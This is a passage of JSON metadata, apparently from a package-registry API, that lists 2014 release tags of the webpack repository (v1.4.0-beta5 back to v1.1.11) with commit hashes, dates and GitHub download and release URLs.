a5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpac